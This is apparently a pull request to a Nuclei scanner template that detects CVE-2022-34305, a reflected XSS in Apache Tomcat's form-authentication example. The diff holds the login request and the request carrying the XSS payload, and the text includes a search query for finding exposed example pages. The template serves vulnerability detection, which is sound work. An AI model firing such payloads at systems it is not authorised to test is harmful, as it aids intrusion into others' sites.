### PR TITLE
Add CVE-2022-34305 (Updated CVEs)

### DIFF
--- a/http/cves/2022/CVE-2022-34305.yaml
+++ b/http/cves/2022/CVE-2022-34305.yaml
@@ -35,7 +35,7 @@ info:
     google-query: site:*/examples/jsp/snp/snoop.jsp
   tags: cve,cve2022,xss,apache,tomcat,authenticated
 
-flow: http(1) && http(2) && http(3)
+flow: http(1) && http(2)
 
 http:
   - raw:
@@ -57,11 +57,10 @@ http:
         Host: {{Hostname}}
         Content-Type: application/x-www-form-urlencoded
 
-        j_username={{user}}&j_password={{pass}}
+        j_username={{username}}&j_password={{password}}
 
-  - raw:
       - |
-        GET /examples/jsp/security/protected/index.jsp?dataName=%3Cscript%3Ealert(1)%3C/script%3E&dataValue=demo HTTP/1.1
+        GET /examples/jsp/security/protected/index.jsp?dataName=%3Cscript%3Ealert(document.domain)%3C/script%3E&dataValue=demo HTTP/1.1
         Host: {{Hostname}}
 
     matchers:
@@ -69,5 +68,5 @@ http:
         dsl:
           - 'status_code == 200'
           - 'contains(content_type, "text/html")'
-          - 'contains(body, "<script>alert(1)</script>")'
+          - 'contains(body, "<script>alert(document.domain)</script>")'
         condition: and


### PR DESCRIPTION
### Add CVE-2022-34305

 In Apache Tomcat 10.1.0-M1 to 10.1.0-M16, 10.0.0-M1 to 10.0.22, 9.0.30 to 9.0.64 and 8.5.50 to 8.5.81 the Form authentication example in the examples web application displayed user provided data without filtering, exposing a XSS vulnerability.

- References:
    - https://nvd.nist.gov/vuln/detail/cve-2022-34305
    - https://github.com/zeroc00I/CVE-2022-34305
### Template validation

- [x] Validated with a host running a vulnerable version and/or configuration (True Positive)
- [ ] Validated with a host running a patched version and/or configuration (avoid False Positive)

#### Additional Details (leave it blank if not applicable)

<!-- Include `nuclei -debug` output along with Shodan / Fofa / Google Query / Docker or screenshots if available -->
<!-- Please do NOT include vulnerable host information in pull requests -->
<!-- None of the prerequisites are obligatory; they are merely intended to speed the review process. -->

### Additional References:

- [Nuclei Template Creation Guideline](https://docs.projectdiscovery.io/templates/introduction)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)
